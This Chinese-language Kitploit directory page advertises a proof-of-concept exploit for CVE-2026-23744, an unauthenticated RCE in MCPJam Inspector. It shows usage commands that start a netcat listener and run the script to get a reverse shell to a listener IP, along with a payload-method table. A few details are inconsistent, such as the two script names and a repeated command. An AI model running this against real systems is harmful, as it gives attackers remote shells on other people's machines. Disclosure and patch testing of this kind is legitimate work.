Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — 针对 MCPJam Inspector <= 1.4.2 中未认证远程代码执行漏洞的概念验证漏洞利用。 | Kitploit
工具/GitHubGitHub/sbouabid-sec/cve-2026-23744-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubsbouabid-sec/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — 针对 MCPJam Inspector <= 1.4.2 中未认证远程代码执行漏洞的概念验证漏洞利用。

查看仓库
23个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744 — MCPJam Inspector 未认证远程代码执行

Python CVE Platform

MCPJam Inspector <= 1.4.2 默认绑定到 0.0.0.0,并公开 /api/mcp/connect 接口,且无需任何身份验证。该接口接受一个 serverConfig 对象,该对象会直接在主机上生成进程——传入反弹 shell 载荷即可在无需任何凭据的情况下立即获得 RCE。


环境要求

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]

反弹 Shell 示例

步骤 1 — 启动你的监听器:

root@kitploit:~
nc -lvnp 4444

步骤 2 — 运行漏洞利用脚本:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

载荷方法

如果目标上 busybox 不可用,请尝试其他方法:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

受影响版本

软件受影响版本修复版本
MCPJam Inspector<= 1.4.21.4.3

参考资料

  • CrowdSec CVE 追踪器 — CVE-2026-23744
  • MCPJam Inspector GitHub 仓库
下载工具
Flag描述默认值
-u目标 URL必填
-i你的监听 IP(LHOST)必填
-p你的监听端口(LPORT)必填
-m载荷方法:busybox、bash、python3busybox